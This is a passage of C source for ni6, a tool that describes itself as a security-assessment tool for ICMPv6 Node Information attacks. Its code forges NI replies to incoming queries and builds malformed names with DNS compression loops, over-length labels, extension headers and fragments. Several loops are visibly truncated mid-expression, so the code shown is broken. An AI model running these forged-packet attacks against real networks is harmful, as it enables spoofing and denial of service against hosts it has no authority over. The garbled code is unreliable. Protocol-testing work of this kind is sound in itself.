exit(EXIT_SUCCESS); } if(listen_f){ if(named_f || fnamed_f || exceedpd_f || dloopattack_f){ qtype= NI_QTYPE_DNSNAME; } else if(ipv4addrd_f){ qtype= NI_QTYPE_IPV4ADDR; } else if(ipv6addrd_f){ qtype= NI_QTYPE_NODEADDR; } else if(!qtype_f){ qtype= NI_QTYPE_NOOP; } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NI_QUERY, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); type= ICMP6_NI_REPLY; if(idata.verbose_f){ print_attack_info(&idata); } if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming IPv6 packets..."); } while(listen_f){ rset= sset; #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_usec=10000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #else if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a Neighbor Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ( (unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); accepted_f=0; if(pkt_ni->ni_type != ICMP6_NI_QUERY){ continue; } if(pkt_ni->ni_qtype != htons(qtype)){ continue; } if(!rand_src_f){ if(!IN6_IS_ADDR_MC_LINKLOCAL(&(pkt_ipv6->ip6_dst)) && \ !is_ip6_in_address_list(&(idata.ip6_global), &(pkt_ipv6->ip6_dst)) && \ !is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.ip6_local))) continue; } if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Neighbor Advertisement */ send_packet(&idata, pktdata, pkthdr); } } } exit(EXIT_SUCCESS); } if(!idata.dstaddr_f && !listen_f){ puts("Error: Nothing to send! (key parameters left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: print_ni_data() * * Wrapper to call the different functions that print the contents of NI replies */ int print_ni_data(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct icmp6_nodeinfo *pkt_ni; pkt_ni= (struct icmp6_nodeinfo *) ((char *)pktdata + idata->linkhsize + sizeof(struct ip6_hdr)); switch(ntohs(pkt_ni->ni_qtype)){ case NI_QTYPE_NOOP: if(print_ni_noop(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_SUPTYPES: if(print_ni_noop(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_DNSNAME: if(print_ni_name(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_NODEADDR: if(print_ni_addr6(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_IPV4ADDR: if(print_ni_addr6(idata, pktdata, pkthdr) == -1){ return(-1); } break; default: break; } return(0); } /* * Function: print_ni_addr() * * Print responses to ICMPv6 NI queries for IPv4 addresses */ int print_ni_addr(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; uint16_t flags; struct ni_reply_ip *pkt_nidata; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: printf("\tCode: 0 (Successful reply)"); break; case 1: printf("\tCode: 1 (Node refuses to supply the answer)"); break; case 2: printf("\tCode: 2 (Qtype unknown to the responder)"); break; default: printf("\tCode: %u (Qtype unknown)", pkt_ni->ni_code); break; } flags= ntohs(pkt_ni->ni_flags); printf("\tFlags: %s%s%s%s%s%s%s\n", ((flags & NI_NODEADDR_FLAG_GLOBAL)?"G":""), \ ((flags & NI_NODEADDR_FLAG_SITELOCAL)?"S":""), \ ((flags & NI_NODEADDR_FLAG_LINKLOCAL)?"L":""), \ ((flags & NI_NODEADDR_FLAG_COMPAT)?"C":""),\ ((flags & NI_NODEADDR_FLAG_ALL)?"A":""), \ ((flags & NI_NODEADDR_FLAG_TRUNCATE)?"T":""),\ ((!flags)?"none":"")); pkt_nidata= (struct ni_reply_ip *) ((char *)pkt_ni + sizeof(struct icmp6_nodeinfo)); while( (pkt_end - (unsigned char *) pkt_nidata) >= sizeof(struct ni_reply_ip)){ if(inet_ntop(AF_INET, &(pkt_nidata->ip), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv4 Address to presentation format"); return(-1); } printf("\t%s (TTL: %lu%s)\n", pv6addr, (LUI) pkt_nidata->ni_ip_ttl,\ (pkt_nidata->ni_ip_ttl==0xffffffff)?" (infinity)":""); pkt_nidata++; } if( (unsigned char *)pkt_nidata != pkt_end){ puts("Incomplete data in received NI Reply\n"); } else{ puts(""); } return(0); } /* * Function: print_ni_noop() * * Print responses to NOOP ICMPv6 NI queries */ int print_ni_noop(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: puts("\tCode: 0 (Successful reply)\n"); break; case 1: puts("\tCode: 1 (Node refuses to supply the answer)\n"); break; case 2: puts("\tCode: 2 (Qtype unknown to the responder)\n"); break; default: printf("\tCode: %u (Qtype unknown)\n\n", pkt_ni->ni_code); break; } return(0); } /* * Function: print_ni_addr6() * * Print responses to ICMPv6 NI queries for IPv6 addresses */ int print_ni_addr6(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; uint16_t flags; struct ni_reply_ip6 *pkt_nidata; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: printf("\tCode: 0 (Successful reply)"); break; case 1: printf("\tCode: 1 (Node refuses to supply the answer)"); break; case 2: printf("\tCode: 2 (Qtype unknown to the responder)"); break; default: printf("\tCode: %u (Qtype unknown)", pkt_ni->ni_code); break; } flags= ntohs(pkt_ni->ni_flags); printf("\tFlags: %s%s%s%s%s%s%s\n", ((flags & NI_NODEADDR_FLAG_GLOBAL)?"G":""), \ ((flags & NI_NODEADDR_FLAG_SITELOCAL)?"S":""), \ ((flags & NI_NODEADDR_FLAG_LINKLOCAL)?"L":""), \ ((flags & NI_NODEADDR_FLAG_COMPAT)?"C":""),\ ((flags & NI_NODEADDR_FLAG_ALL)?"A":""), \ ((flags & NI_NODEADDR_FLAG_TRUNCATE)?"T":""),\ ((!flags)?"none":"")); pkt_nidata= (struct ni_reply_ip6 *) ((char *)pkt_ni + sizeof(struct icmp6_nodeinfo)); while( (pkt_end - (unsigned char *) pkt_nidata) >= sizeof(struct ni_reply_ip6)){ if(inet_ntop(AF_INET6, &(pkt_nidata->ip6), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(-1); } printf("\t%s (TTL: %lu%s)\n", pv6addr, (LUI) pkt_nidata->ni_ip6_ttl,\ (pkt_nidata->ni_ip6_ttl==0xffffffff)?" (infinity)":""); pkt_nidata++; } if( (unsigned char *)pkt_nidata != pkt_end){ puts("Incomplete data in received NI Reply\n"); } else{ puts(""); } return(0); } /* * Function: print_ni_name() * * Print responses to ICMPv6 NI queries for names */ int print_ni_name(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; struct ni_reply_name *pkt_nidata; unsigned char *start, *next; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: puts("\tCode: 0 (Successful reply)"); break; case 1: puts("\tCode: 1 (Node refuses to supply the answer)"); break; case 2: puts("\tCode: 2 (Qtype unknown to the responder)"); break; default: printf("\tCode: %u (Qtype unknown)\n", pkt_ni->ni_code); break; } pkt_nidata= (struct ni_reply_name *) ((char *)pkt_ni + sizeof(struct icmp6_nodeinfo)); start= (unsigned char *) pkt_nidata; next= (unsigned char *) &(pkt_nidata->ni_name_name); while(next != NULL && dns_decode(start, pkt_end-start, next, domain, sizeof(domain), &next) == 0){ printf("\t%s (TTL: %lu%s)\n", domain, (LUI) pkt_nidata->ni_name_ttl,\ (pkt_nidata->ni_name_ttl==0xffffffff)?" (infinity)":""); } puts(""); return(0); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); exit(EXIT_FAILURE); } /* We prepare a separate Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ int send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ ptr=startofprefixes; if(pktdata != NULL){ /* Sending a NI Reply in response to a received query */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ( (unsigned char *)pkt_ipv6 + sizeof (struct ip6_hdr)); /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address. */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ return 0; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* If the query was sent to a multicast address, we respond with a forged link-local address. Otherwise we respond to the unicast address that elicited our response XXX: [fgont] Changed */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ ipv6->ip6_src= idata->srcaddr; ethernet->src= idata->hsrcaddr; } else{ ipv6->ip6_src= pkt_ipv6->ip6_dst; ethernet->src= pkt_ether->dst; } ni= (struct icmp6_nodeinfo *) ptr; ni->ni_type= ICMP6_NI_REPLY; ni->ni_code= 0; ni->ni_qtype= pkt_ni->ni_qtype; ni->ni_flags= pkt_ni->ni_flags; for(i=0; i<8; i++) ni->icmp6_ni_nonce[i]= pkt_ni->icmp6_ni_nonce[i]; ptr= ptr + sizeof(struct icmp6_nodeinfo); switch(ntohs(pkt_ni->ni_qtype)){ case NI_QTYPE_NOOP: break; case NI_QTYPE_SUPTYPES: break; case NI_QTYPE_DNSNAME: if(dloopattack_f){ if((ptr+(dlsize+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name payload"); return(-1); } memset(ptr, 0, 4); ptr+=4; memcpy(ptr, dlpointer, dlsize); ptr+= dlsize; } else if(named_f){ if((ptr+ (namedlen+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name"); return(-1); } /* The response contains a TTL, and it is set to 0 */ memset(ptr, 0, 4); ptr+= 4; memcpy(ptr, named, namedlen); ptr+= namedlen; if(snamedslabel_f){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Error while inserting last label"); return(-1); } else{ *ptr=0; ptr++; } } } else if(fnamed_f && fnamedlen>0){ if((ptr+ (fnamedlen+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when inserting forged name"); return(-1); } /* The response contains a TTL, and it is set to 0 */ memset(ptr, 0, 4); ptr+= 4; i=fnamedlen-1; /* There is a zero-length label at the end */ if(snamedslabel_f && i>0) i=i-1; while(i>0){ if(i<= (maxlabel+1)){ /* This accounts for the length byte */ i=i-1; *ptr=i; ptr++; for(j=0; j1){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ return(-1); } else{ *ptr=0; ptr++; } } } else if(exceedpd_f){ if( (ptr+5) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large whil inserting 'exceeding' name"); return(-1); } /* The response contains a TTL, and it is set to 0 */ memset(ptr, 0, 4); ptr+= 4; *ptr= exceedpd; ptr++; } else if(payloadsize_f){ if(payloadsize>=4) payloadsize-=4; if((ptr+(payloadsize+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } /* The response contains a TTL, and it is set to 0 */ memset(ptr, 0, 4); ptr+= 4; for(i=0; i (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when inserting IPv6 address"); return(-1); } *(struct in6_addr *)ptr= ipv6addrd; ptr= ptr+ sizeof(struct in6_addr); } else if(payloadsize_f){ if((ptr+payloadsize) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } for(i=0; i (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting IPv4 address"); return(-1); } *(struct in_addr *)ptr= ipv4addrd; ptr= ptr+ sizeof(struct in_addr); } else if(payloadsize_f){ if((ptr+payloadsize) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } for(i=0; ini_type= ICMP6_NI_QUERY; ni->ni_code= code; ni->ni_qtype= htons(qtype); ni->ni_flags= htons(flags); for(i=0; i<8; i++) ni->icmp6_ni_nonce[i]= random(); ptr= ptr + sizeof(struct icmp6_nodeinfo); if(ipv4addr_f){ if( (ptr+sizeof(struct in_addr)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting IPv4 address"); return(-1); } *(struct in_addr *)ptr= ipv4addr; ptr= ptr+ sizeof(struct in_addr); } else if(ipv6addr_f){ if( (ptr+sizeof(struct in6_addr)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting IPv6 address"); return(-1); } *(struct in6_addr *)ptr= ipv6addr; ptr= ptr+ sizeof(struct in6_addr); } else if(name_f){ if((ptr+namelen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name"); return(-1); } memcpy(ptr, name, namelen); ptr+= namelen; if(snameslabel_f){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Error while inserting last label"); return(-1); } else{ *ptr=0; ptr++; } } } else if(fname_f && fnamelen>0){ if((ptr+fnamelen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when inserting forged name"); return(-1); } i=fnamelen-1; /* There is a zero-length label at the end */ if(snameslabel_f && i>0) i=i-1; while(i>0){ if(i<= (maxlabel+1)){ /* This accounts for the length byte */ i=i-1; *ptr=i; ptr++; for(j=0; j1){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ return(-1); } else{ *ptr=0; ptr++; } } } else if(exceedp_f){ if( (ptr+1) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when 'exceeding' name"); return(-1); } *ptr= exceedp; ptr++; } else if(payloadsize_f){ if((ptr+payloadsize) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } for(i=0; i (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name payload"); return(-1); } memset(ptr, 0, 4); ptr+=4; memcpy(ptr, slpointer, slsize); ptr+= slsize; } } ni->ni_cksum = 0; ni->ni_cksum = in_chksum(v6buffer, ni, ptr-(unsigned char *)ni, IPPROTO_ICMPV6); if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ return 0; } /* * Function: usage() * * Prints the syntax of the ni6 tool */ void usage(void){ puts("usage:\n" " ni6 [-i INTERFACE] [-S LINK_SRC_ADDR | -R] [-D LINK-DST-ADDR] \n" " [-s SRC_ADDR[/LEN] | -r] [-d DST_ADDR] [-c HOP_LIMIT] [-y FRAG_SIZE]\n" " [-u DST_OPT_HDR_SIZE] [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] \n" " [-P SIZE | -6 IPV6_ADDR | -4 IPV4_ADDR | -n NAME | -N LEN | -x LEN -o TYPE]\n" " [-Z SIZE] [-e] [-C ICMP6_CODE] [-q NI_QTYPE] [-X NI_FLAGS]\n" " [-P SIZE | -w IPV6_ADDR | -W IPV4_ADDR | -a NAME | -A LEN | -Q LEN -O TYPE]\n" " [-E] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]] [-J LINK_ADDR]\n" " [-K LINK_ADDR] [-b PREFIX[/LEN]] [-g PREFIX[/LEN]] [-B LINK_ADDR]\n" " [-G LINK_ADDR] [-L | -l] [-z] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the ni6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("ni6: Securty assessment tool for attack vectors based on ICMPv6 NI messages\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -c IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --payload-size, -P ICMPv6 NI payload size\n" " --subject-ipv6. -6 Subject IPv6 Address\n" " --subject-ipv4, -4 Subject IPv4 address\n" " --subject-name, -n Subject Name\n" " --subject-fname, -N Forge Subject Name of specific length\n" " --subject-ename, -x For (malformed) Subject name of specified length\n" " --subject-nloop, -o Subject is a Name with a DNS compression loop\n" " --max-label-size, -Z Maximum DNS label size (defaults to 63)\n" " --sname-slabel, -e Subject Name is a single-label name\n" " --code, -C ICMPv6 code\n" " --qtype, -q ICMPv6 NI Qtype\n" " --flags, -X ICMPv6 NI flags\n" " --data-ipv6, -w Data IPv6 Address\n" " --data-ipv4, W Data IPv4 Address\n" " --data-name, -a Data Name\n" " --data-fname, -A Forge Data Name of specific length\n" " --data-ename, -Q For (malformed) Data Name of specified length\n" " --data-nloop, -O Data is a Name with a DNS compression loop\n" " --dname-slabel, -E Subject Name is a single-label name\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --forge-src-addr, -r Forge IPv6 Source Address\n" " --forge-link-src-addr, -R Forge link-layer Source Address\n" " --loop, -l Send periodic ICMPv6 error messages\n" " --sleep, -z Pause between sending ICMPv6 messages\n" " --listen, -L Listen to incoming traffic\n" " --help, -h Print help for the ni6 tool\n" " --verbose, -v Be verbose\n" "\n" " Programmed by Fernando Gont 